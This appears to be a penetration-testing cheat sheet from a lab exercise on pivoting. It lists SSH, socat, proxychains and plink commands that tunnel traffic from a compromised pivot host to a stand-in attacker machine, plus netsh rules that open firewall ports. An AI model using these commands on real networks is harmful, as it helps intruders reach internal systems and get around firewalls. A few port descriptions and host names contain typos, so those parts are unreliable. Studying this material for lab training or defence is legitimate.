Networking

Port Forwarding for exploits

Attacker Machine -> Pivot Machine -> Victim Machine

SSH Remote Port Forwarding

On Pivot Machine, this forwards traffic from port 1234 on the attacker Machine to port 3389 on the Victim Machine

C:\\> ssh tunneluser@ATTCKER -R 3389:VICTIM:1234 -N

SSH Local Port Forwarding

On Pivot Machine, add the following firewall rules

netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80

On Pivot Machine, this forwards traffic from port 8001 on the attacker Machine to port 80 on the Pivot Machine

C:\\> ssh tunneluser@ATTACKER -L *:80:127.0.0.1:8001 -N

Socat portforwarding

On the Pivot Machine, add the following firewall rules

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

On the Pivot Machine, to forward the Attacker Machine to the Victim Machine

C:\\>socat TCP4-LISTEN:3389,fork TCP4:SERVER:3389

On Pivot Machine, to forward the Victim Machine to the Attacker Machine

C:\\>socat TCP4-LISTEN:80,fork TCP4:ATTACKER:80

SOCKS

On the Pivot Machine

C:\\> ssh tunneluser@ATTACKER -R 9050 -N

On the Attacker machine, setup proxychains under /etc/proxychains.conf

[ProxyList]
socks4  127.0.0.1 9050

On the Attacker Machine, prefix commands with proxychains to send traffic to port 9050, which is then forwarded to the Pivot Machine

$ proxychains curl <http://pxeboot.za.tryhackme.com>

plink.exe

• Assuming you already have a shell on the victim machine, we can use plink.exe on the victim machine to forward traffic from the attacker machine to other internal networks in the victim network

> .\\plink.exe root@<attacker IP> -R <attacker port>:127.0.0.1:<victim port>

This creates a SSH connection to our attacker machine as root, and forwards any traffic from the attacker port to the victim port on 127.0.0.1